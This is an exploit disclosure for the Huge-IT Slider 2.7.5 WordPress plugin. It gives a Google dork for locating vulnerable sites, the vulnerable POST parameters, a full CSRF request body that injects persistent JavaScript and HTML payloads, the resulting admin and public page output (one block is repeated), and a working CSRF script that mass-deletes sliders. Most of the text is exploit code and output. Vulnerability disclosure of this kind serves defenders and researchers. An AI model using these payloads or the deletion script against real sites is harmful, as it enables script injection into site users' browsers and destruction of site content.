# Exploit Title: WordPress: wordpress huge-it-slider 2.7.5 & Persistent JS-HTML Code injection, Arbitrary slider deletion
# Date: 2015-06-23
# Google Dork: intitle:"index of" intext:"/wp-content/plugins/slider-image/"
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Software Link: https://downloads.wordpress.org/plugin/slider-image.latest-stable.zip
# Version: 2.7.5
# Tested on: windows 7 ultimate + Firefox.
# video demo: https://www.youtube.com/watch?v=RTLAbmyBIU8
====================================================
* CSRF + Persistent JS/HTML Injection
====================================================
=====================
DECRIPTION
=====================
An attacker can make a user with access privileges to a page containing malicious script
and send some parameters injected JavaScript to the database.
============================
vulnerable POST parameters
============================
//variables with variation names//
order_by_[variation_number]
titleimage[variation_number]
sl_url[variation_number]
sl_link_target[variation_number]
im_description[variation_number]
imagess[variation_number]
//variables with constant names//
sl_pausetime
sl_changespeed
===============
EXPLOTATION
===============
variable numbers can be extracted from a published page containing the slider. and make all
parameters injected with code JS / HTML.
-------------------
EXAMPLE
-------------------
[Extracting data for use]
In a vulnerable site and has posted a slider, the malicious user can extract information
the attack is successful.
-----------------------------------------------------------------------------------------
[variation_number] is a variable number that could be extracted as follows.
-----------------------------------------------------------------------------------------
The attacker sees the following framento source code of the page with slider:
<!-- ##########################DOTS######################### -->
<div class="huge_it_slideshow_dots_container_2"> [ <---SLIDER_ID_FOUND=2 ]
<div class="huge_it_slideshow_dots_thumbnails_2">
<div id="huge_it_dots_0_1" class="huge_it_slideshow_dots_1 huge_it_slideshow_dots_active_1"
onclick="huge_it_change_image_1(parseInt(jQuery('#huge_it_current_image_key_1').val()), '0', data_1,false,true);
return false;"
image_id="14" [ <---ITS_VARIATION_NUMBER!!! ]
image_key="0"></div>
</div>
<a id="huge_it_slideshow_left_1" href="#" >
<div id="huge_it_slideshow_left-ico_1">
<div><i class="huge_it_slideshow_prev_btn_1 fa"></i></div></div>
</a>
<a id="huge_it_slideshow_right_1" href="#" >
<div id="huge_it_slideshow_right-ico_1 , data_1">
<div><i class="huge_it_slideshow_next_btn_1 fa"></i></div></div>
</a>
</div>
<!-- ##########################IMAGES######################### -->
-----------------------------------------------------------------------------------
Classes tags [<div>] have a number at the end that is the id of the slider.
Also labeled [<div id = "huge_it_dots_ ...>] has the property [image_id] which is the
POST variable number of vulnerable parameters.
============================================
POC [DATA RELATING TO THE ABOVE]
============================================
------------ SLIDER_ID
URL REQUEST |
------------
http://localhost/wordpress/wp-admin/admin.php?page=sliders_huge_it_slider&id=2&task=apply
--------
POSTDATA
--------
name=i0akiN-SEC&order_by_14=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&imagess14=&
titleimage14=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&
sl_url14=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&sl_link_target14=&
sl_pausetime=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&
sl_changespeed=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&
im_description14=as%3C%2Ftextarea%3E%3Cscript%3Ealert%28%2Fi0akiN_HACK%2F%29%3B%3C%2Fscript%3E&
imagess14=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&sl_width=500&
sl_height=300&pause_on_hover=off&slider_effects_list=cubeH&sl_position=center&task=
--------------------
RESPONSE ADMIN PAGE
--------------------
...
<input class="order_by" type="hidden" name="order_by_14" value="0" />
<div class="image-container">
<img src="" onmouseover=alert(/i0akiN_hack/) a="" />
<div>
<script>
... </script>
<input type="hidden" name="imagess14" id="_unique_name14" value="" onmouseover=alert(/i0akiN_hack/) a="" />
<span class="wp-media-buttons-icon"></span>
<div class="huge-it-editnewuploader uploader button14 add-new-image">
<input type="button" class="button14 wp-media-buttons-icon editimageicon" name="_unique_name_button14" id="_unique_name_button14" value="Edit image" />
</div>
</div>
</div>
<div class="image-options">
<div>
<label for="titleimage14">Title:</label>
<input class="text_area" type="text" id="titleimage14" name="titleimage14" id="titleimage14" value="" onmouseover=alert(/i0akiN_hack/) a="">
</div>
<div class="description-block">
<label for="im_description14">Description:</label>
<textarea id="im_description14" name="im_description14" >as</textarea><script>alert(/i0akiN_HACK/);</script></textarea>
</div>
<div class="link-block">
<label for="sl_url14">URL:</label>
<input class="text_area url-input" type="text" id="sl_url14" name="sl_url14" value="" onmouseover=alert(/i0akiN_hack/) a="" >
<label class="long" for="sl_link_target14">Open in new tab</label>
<input type="hidden" name="sl_link_target14" value="" />
<input class="link_target" type="checkbox" id="sl_link_target14" name="sl_link_target14" />
</div>
<div class="remove-image-container">
<a class="button remove-image" href="admin.php?page=sliders_huge_it_slider&id=2&task=apply&removeslide=14">Remove Image</a>
</div>
</div>
<div class="clear"></div>
</li>
</ul>
</div>
</div>
<div id="postbox-container-1" class="postbox-container">
<div id="side-sortables" class="meta-box-sortables ui-sortable">
<div id="slider-unique-options" class="postbox">
...
<li>
<label for="sl_pausetime">Pause time</label>
<input type="text" name="sl_pausetime" id="sl_pausetime" value="" onmouseover=alert(/i0akiN_hack/) a="" class="text_area" />
</li>
<li>
<label for="sl_changespeed">Change speed</label>
<input type="text" name="sl_changespeed" id="sl_changespeed" value="" onmouseover=alert(/i0akiN_hack/) a="" class="text_area" />
</li>
...
-----------------------------------------
RESPONSE PUBLISHED PAGE WITH IMAGE SLIDER
-----------------------------------------
...
<script>
var data_2 = [];
var event_stack_2 = [];
video_is_playing_2 = false;
data_2["0"] = []; data_2["0"]["id"] = "0"; data_2["0"]["image_url"] = "" onmouseover = alert(/i0akiN_hack/) a = ""; data_2["0"]["description"] = "as</textarea>
<script>alert(/i0akiN_HACK/);</script>";data_2["0"]["alt"]="' onmouseover=alert(/i0akiN_hack/) a='";
===<!-- SUCCESFULL INJECTION :) -->===
var huge_it_trans_in_progress_2 = false;
var huge_it_transition_duration_2 = " onmouseover=alert(/i0akiN_hack/) a=";
var huge_it_playInterval_2;
// Stop autoplay.
window.clearInterval(huge_it_playInterval_2);
....
<!-- ##########################IMAGES######################### -->
<div id="huge_it_slideshow_image_container_2" class="huge_it_slideshow_image_container_2">
<div class="huge_it_slide_container_2">
<div class="huge_it_slide_bg_2">
<ul class="huge_it_slider_2">
<li class="huge_it_slideshow_image_item_2" id="image_id_2_0">
<a href="" onmouseover=alert(/i0akiN_hack/) a="" ><img id="huge_it_slideshow_image_2" class="huge_it_slideshow_image_2"
src="" onmouseover=alert(/i0akiN_hack/) a="" image_id="14" />
</a>
<div class="huge_it_slideshow_title_text_2 "> " onmouseover=alert(/i0akiN_hack/) a="</div>
<div class="huge_it_slideshow_description_text_2 ">as</textarea><script>alert(/i0akiN_HACK/);</script> </div>
</li>
<input type="hidden" id="huge_it_current_image_key_2" value="0" />
</ul>
</div>
</div>
</div>
...
-----------------------------------------
RESPONSE PUBLISHED PAGE WITH IMAGE SLIDER
-----------------------------------------
...
<script>
var data_2 = [];
var event_stack_2 = [];
video_is_playing_2 = false;
data_2["0"] = []; data_2["0"]["id"] = "0"; data_2["0"]["image_url"] = "" onmouseover = alert(/i0akiN_hack/) a = ""; data_2["0"]["description"] = "as</textarea>
<script>alert(/i0akiN_HACK/);</script>";data_2["0"]["alt"]="' onmouseover=alert(/i0akiN_hack/) a='";
===<!-- SUCCESFULL INJECTION :) -->===
var huge_it_trans_in_progress_2 = false;
var huge_it_transition_duration_2 = " onmouseover=alert(/i0akiN_hack/) a=";
var huge_it_playInterval_2;
// Stop autoplay.
window.clearInterval(huge_it_playInterval_2);
....
<!-- ##########################IMAGES######################### -->
<div id="huge_it_slideshow_image_container_2" class="huge_it_slideshow_image_container_2">
<div class="huge_it_slide_container_2">
<div class="huge_it_slide_bg_2">
<ul class="huge_it_slider_2">
<li class="huge_it_slideshow_image_item_2" id="image_id_2_0">
<a href="" onmouseover=alert(/i0akiN_hack/) a="" ><img id="huge_it_slideshow_image_2" class="huge_it_slideshow_image_2"
src="" onmouseover=alert(/i0akiN_hack/) a="" image_id="14" />
</a>
<div class="huge_it_slideshow_title_text_2 "> " onmouseover=alert(/i0akiN_hack/) a="</div>
<div class="huge_it_slideshow_description_text_2 ">as</textarea><script>alert(/i0akiN_HACK/);</script> </div>
</li>
<input type="hidden" id="huge_it_current_image_key_2" value="0" />
</ul>
</div>
</div>
</div>
...
====================================
* CSRF & ARBITRARY SLIDER DELETION
====================================
=====================
POC
=====================
//delete first 100 sliders
<script>
function sendData( id_slider ){
var req=new XMLHttpRequest();
req.open("GET","http://localhost/wordpress/wp-admin/admin.php?page=sliders_huge_it_slider&task=remove_cat&id="+id_slider,true);
req.withCredentials="true";
req.send();
}
for(var i=0;i<100;i++){
sendData( i );
}
</script>
token authentication not found!
